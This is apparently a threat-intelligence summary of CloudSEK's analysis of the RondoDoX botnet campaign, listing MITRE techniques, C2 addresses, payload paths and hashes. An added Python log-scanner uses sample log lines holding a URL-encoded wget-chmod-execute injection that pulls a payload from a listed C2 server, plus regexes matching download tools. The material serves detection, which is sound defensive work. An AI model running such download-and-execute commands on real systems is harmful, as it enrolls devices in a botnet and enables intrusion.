RondoDoX Botnet Weaponizes React2Shell | CloudSEK

CloudSEK recovered nine months of exposed RondoDoX/Rondo botnet C2 logs that document a three-phase campaign, evolving from reconnaissance and web-application exploitation to large-scale IoT botnet deployment and a December 2025 Next.js Server Actions RCE wave. The activity included automated command-injection and deserialization attacks, mass binary downloads (e.g., /nuts/poop) from C2s such as 51.81.104.115 and 5.255.121.141, and repeated exploitation of internet-facing routers and Next.js servers.

Keypoints

  • CloudSEK analyzed exposed botnet C2 logs spanning March–December 2025 that revealed three distinct operational phases: reconnaissance, web application exploitation, and IoT botnet deployment.
  • Rondo is the primary malware family with 10+ variants and multi‑architecture payloads (x86, x86_64, MIPS, ARM, PowerPC) delivered via wget/curl/tftp/ftp fallbacks.
  • Next.js Server Actions prototype/deserialization RCE became the dominant attack vector starting 13 December 2025, with hourly exploitation attempts and rapid infrastructure shifts by the actor.
  • Confirmed C2 infrastructure includes multiple IPs (e.g., 74.194.191.52, 51.81.104.115, 5.255.121.141) used to host payloads like /nuts/poop and /nuts/x86 (Mirai), plus loaders and persistence scripts.
  • The campaign combined web‑app exploits (SQLi, Struts2 OGNL, Java deserialization, WebLogic, WordPress/Drupal vectors) to pivot into IoT devices (routers, cameras) and enroll them into botnets and cryptomining operations.
  • Recommended mitigations include immediate Next.js Server Actions audits/patching, IoT segmentation and hardening, WAF rules to block command-injection patterns, blocking identified C2s at perimeter, and behavioral monitoring for persistence indicators.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to exploit web frameworks and services (Next.js, Struts2, WebLogic, Drupal, WordPress) to achieve RCE; (‘SQL Injection testing’)
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Command injection and shell execution observed on routers and web panels to run diagnostic commands and download binaries; (‘Router diagnostic command injection’)
  • [T1190] Exploit Public-Facing Application – Java deserialization was tested and exploited as a vector for remote code execution; (‘Java Deserialization testing’)
  • [T1190] Exploit Public-Facing Application – Struts2 OGNL injection was used to gain code execution against vulnerable applications; (‘Struts2 OGNL injection’)
  • [T1505.003] Server Software Component: Web Shell – Threat actors deployed and used web shells as a persistence and post-exploitation mechanism; (‘web shells’)
  • [T1105] Ingress Tool Transfer – Binary download and execution from C2 (e.g., wget/curl to /tmp/123, chmod +x and background execution) was used to deliver botnet clients and miners; (‘Binary download and execution’)
  • [T1567.002] Exfiltration Over Web Service – Blind RCE testing with output exfiltration via redirects and HTTP responses was used to verify and leak command outputs; (‘Blind RCE testing with output exfiltration via redirects’)
  • [T1498] Network Denial of Service (abuse/poisoning of NTP) – NTP server poisoning and diagnostic abuse were used as part of infrastructure manipulation and device targeting; (‘NTP server poisoning’)

Indicators of Compromise

  • [IP Address] confirmed C2 infrastructure – 74.194.191.52, 51.81.104.115, and other C2s including 5.255.121.141, 41.231.37.153, 70.184.13.47 (multiple instances documented)
  • [URI / Filename] malicious payload and loader paths – /nuts/poop, /nuts/bolts, /nuts/x86 (used to deliver coinminer/loader/Mirai payloads)
  • [File Hash (sha256)] binary payloads – 895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b (/nuts/poop coinminer), 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (/nuts/x86 Mirai), and 2 more hashes
  • [File Name Pattern] botnet scripts – rondo.[device-type].sh observed deployed to compromised routers (example filename pattern: rondo.linksys.sh)
  • [IP Address pivot] additional C2 pivot discovered via image hash – 5.231.70.66 (found by pivoting on asset hash)
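To turn the indicators above and the T1105 download-chmod-execute chain into a practical check, here is an added detection example (not CloudSEK's code): it parses web access-log lines and tags requests that reference the listed C2 addresses or /nuts/ payload paths, or that carry the full fetch, chmod +x, background-execute sequence. The sample log lines, client addresses and regular expressions are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# C2 addresses and payload paths are the ones listed in the indicators above.
C2_IPS = {"74.194.191.52", "51.81.104.115", "5.255.121.141",
          "41.231.37.153", "70.184.13.47", "5.231.70.66"}
PAYLOAD_PATHS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")

# Download-then-execute chain described under T1105: fetch the binary,
# mark it executable, and launch it in the background (typically from /tmp).
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftp)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b")
EXEC_RE = re.compile(r"/tmp/\S+\s*(&|;|$)")

# Common/combined access-log prefix: client ident user [time] "request" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# Constructed sample lines (hypothetical clients from TEST-NET ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Dec/2025:10:02:03 +0000] "GET /diag.cgi?host=127.0.0.1%3Bwget+http%3A%2F%2F51.81.104.115%2Fnuts%2Fpoop+-O+%2Ftmp%2F123%3Bchmod+%2Bx+%2Ftmp%2F123%3B%2Ftmp%2F123+%26 HTTP/1.1" 200 77',
    '198.51.100.9 - - [13/Dec/2025:10:05:44 +0000] "GET /cgi-bin/diag?cmd=curl+http%3A%2F%2F5.255.121.141%2Fnuts%2Fx86 HTTP/1.1" 404 0',
]

def classify(line):
    """Return the list of indicator tags that fire on one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    req = unquote_plus(m.group("req"))  # decode %XX and '+' before matching
    tags = []
    if any(ip in req for ip in C2_IPS):
        tags.append("c2-ip")
    if any(path in req for path in PAYLOAD_PATHS):
        tags.append("rondo-payload-path")
    if DOWNLOAD_RE.search(req) and CHMOD_RE.search(req) and EXEC_RE.search(req):
        tags.append("download-chmod-exec")
    return tags

def scan(lines):
    """Return (client_ip, tags) for every line that triggers at least one tag."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            hits.append((LOG_RE.match(line).group("ip"), tags))
    return hits

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, ", ".join(tags))
```

The decode step matters: URL-encoded payloads in the query string do not match the raw line, so a WAF or log rule must normalise before comparing against the indicators.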


Read more: https://www.cloudsek.com/blog/rondodox-botnet-weaponizes-react2shell